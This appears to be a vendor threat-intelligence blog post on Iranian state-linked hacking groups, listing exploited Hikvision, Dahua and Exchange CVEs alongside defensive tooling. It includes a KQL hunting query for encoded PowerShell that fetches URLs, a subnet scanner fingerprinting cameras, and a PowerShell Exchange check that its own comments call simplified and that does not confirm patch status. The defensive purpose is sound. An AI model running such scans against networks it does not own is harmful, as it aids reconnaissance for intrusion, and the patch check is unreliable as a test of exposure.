Operation Epic Fury: Iranian APTs Escalate to Hybrid Warfare and Critical Infrastructure Attacks

In the complex landscape of geopolitical conflict, the digital battlefield often mirrors physical hostilities. Following the recent military operations known as Operation Epic Fury, cybersecurity researchers at Security Arsenal have observed a significant and alarming shift in Iranian cyber operations. We are witnessing a transition from "quiet" espionage-focused campaigns to loud, disruptive, and destructive hybrid offensives targeting Western, Israeli, and regional economic interests.

This post analyzes the escalation of Iranian Ministry of Intelligence and Security (MOIS) affiliated actors, specifically focusing on the tactics of MuddyWater and the Void Manticore persona (Handala), and the surge in exploitation targeting IP cameras.

The Shift: From Espionage to Destruction

Historically, Iranian-nexus threat actors have prioritized intelligence gathering and stealthy persistence. However, recent kinetic strikes appear to have triggered a retaliatory response where the gloves are coming off. The Tenable Research Special Operations (RSO) team reports that groups like MuddyWater are no longer content with simply watching; they are pre-positioning access for destructive outcomes.

We are seeing a "tag-team" approach:

1. Initial Access Brokers (IABs): Groups like MuddyWater (aka Seedworm) infiltrate networks—targeting telecommunications, government bodies, and airports—establishing a foothold weeks before major military operations.
2. Destructive Operators: Once data is exfiltrated, actors like Handala (Void Manticore) step in to wipe systems using custom wipers like BiBi Wiper and Cl Wiper.

A recent example includes the claim by Handala of a devastating attack on Stryker, a global medical technology firm. The group alleges the compromise of over 200,000 systems, including mobile devices via a compromised Microsoft Intune instance, and the theft of 50 terabytes of data.

The Criminal Veil: MOIS and RaaS Alliances

Attribution is becoming increasingly difficult as state-sponsored actors blur the lines with cybercrime. Recent intelligence suggests MOIS-affiliated groups are leveraging infrastructure from established cybercriminal gangs. Specifically, MuddyWater has been observed using infrastructure linked to Qilin, a notorious Ransomware-as-a-Service (RaaS) operator.

This collaboration serves two purposes:

• Obfuscation: It provides a layer of plausible deniability, making attribution tricky for defenders.
• Capability: It grants state actors access to mature, destructive tools typically found in the criminal underground.

IoT in the Crosshairs: Exploiting IP Cameras

Perhaps the most concerning development for critical infrastructure defenders is the surge in attacks against IP cameras. Iranian-nexus actors are actively targeting devices from Hikvision and Dahua.

While the motive may be surveillance for kinetic targeting or post-strike assessment, the compromise of these devices poses a severe risk to network integrity. Attackers are exploiting known vulnerabilities to gain a foothold in operational environments.

Critical CVEs Under Active Exploitation

Security Arsenal analysts recommend prioritizing patches for the following vulnerabilities, which have high CVSS scores and are actively being utilized in the wild:

• CVE-2025-34067 (Hikvision Integrated Security Management Platform) - CVSS 9.8
• CVE-2023-6895 (Hikvision Intercom Broadcasting System) - CVSS 9.8
• CVE-2021-36260 (Hikvision IP Camera Command Injection) - CVSS 9.8
• CVE-2021-33044 (Dahua Authentication Bypass) - CVSS 9.8
• CVE-2017-7921 (Hikvision IP Camera Improper Authentication) - CVSS 10.0

Additionally, legacy vulnerabilities such as CVE-2017-11882 (Microsoft Office) and CVE-2020-0688 (Microsoft Exchange) remain staples in their arsenal for initial access.

Detection and Threat Hunting

Defending against these sophisticated threats requires visibility into both endpoint activity and network traffic. Below are detection strategies and queries to help identify potential compromise or vulnerable assets.

1. Hunt for Suspicious PowerShell Activity (MuddyWater TTPs)

MuddyWater frequently relies on PowerShell for execution and defense evasion. Use this KQL query in Microsoft Sentinel to hunt for suspicious encoded commands or typical obfuscation patterns.

DeviceProcessEvents
| where Timestamp > ago(7d)
| where FileName in~ ("powershell.exe", "pwsh.exe")
| where ProcessCommandLine has "-enc" or ProcessCommandLine has "-EncodedCommand"
| where ProcessCommandLine matches regex @"[A-Za-z0-9+/]{50,}={0,2}"
| project Timestamp, DeviceName, AccountName, ProcessCommandLine, InitiatingProcessFileName
| extend URLParams = extract_all(@"https?://[^\s]+", ProcessCommandLine)
| where isnotempty(URLParams)

2. Identify Exposed or Vulnerable IP Cameras

You can use Bash to scan your local subnets for devices identifying themselves as Hikvision or Dahua. This helps identify assets that need immediate patching or network segmentation.

#!/bin/bash

# Define the subnet range to scan (modify as needed)
SUBNET="192.168.1.0/24"

echo "Scanning $SUBNET for Hikvision and Dahua devices..."

# Use nmap to check HTTP headers and Server fields
nmap -p 80,443,8000 --open $SUBNET -oG - | \nawk '/\/open\// {print $2}' | \nwhile read ip; do
  # Extract Server header via curl (timeout 2s)
  header=$(curl -s --max-time 2 -I $ip | grep -i "Server")
  if [[ "$header" == *"Hikvision"* ]] || [[ "$header" == *"Dahua"* ]]; then
    echo "[!] Potential vulnerable device found at $ip"
    echo "    Header: $header"
  fi
done

3. PowerShell Check for Exchange Vulnerability (CVE-2020-0688)

Check if your Exchange server is missing the patch for CVE-2020-0688 by validating the web.config file version or the existence of the validation logic. This snippet checks for the specific file structure indicative of a patched system.

$ExchangePath = "C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\ecp\web.config"
if (Test-Path $ExchangePath) {
    $content = Get-Content $ExchangePath -Raw
    # A patched system contains specific validation keys. This is a simplified check.
    if ($content -match "validationKey") {
        Write-Host "[+] $ExchangePath found. Manual verification of patch status required." -ForegroundColor Cyan
    } else {
        Write-Host "[-] Configuration file missing expected keys. Potential risk." -ForegroundColor Yellow
    }
} else {
    Write-Host "[?] Exchange Path not found on this host." -ForegroundColor Gray
}

Mitigation Strategies

To defend against this heightened threat landscape, organizations should implement the following measures immediately:

1. Patch Critical Vulnerabilities: Prioritize updating Hikvision and Dahua firmware to address the CVEs listed above. If patching is not immediately possible, place these devices behind a firewall with strict egress rules or disable their internet connectivity entirely.
2. Network Segmentation: Ensure IoT devices (cameras) are on a separate VLAN from critical business systems and servers. Iranian actors often pivot from IoT to IT networks.
3. Disable Unused Services: If you are not using OWA (Outlook Web Access) or other internet-facing Exchange services, disable them. CVE-2020-0688 remains a popular entry point.
4. Audit MFA and Cloud Intunes: In light of the Stryker incident, audit your Microsoft Entra ID (formerly Azure AD) and Intune configurations. Ensure Conditional Access policies are strict and that admin accounts are monitored for anomalous login attempts.

Conclusion

The cyber fallout from Operation Epic Fury demonstrates the blurring lines between state-sponsored espionage, cybercrime, and physical warfare. Iranian actors are actively targeting critical infrastructure, technology companies, and healthcare sectors with destructive intent.

Security Arsenal continues to monitor these threats closely. We urge all organizations, especially those in the critical infrastructure sector, to assume compromise and actively hunt for the indicators of compromise discussed above.

Related Resources

Security Arsenal Managed SOC Services AlertMonitor Platform Book a SOC Assessment pen-testing Intel Hub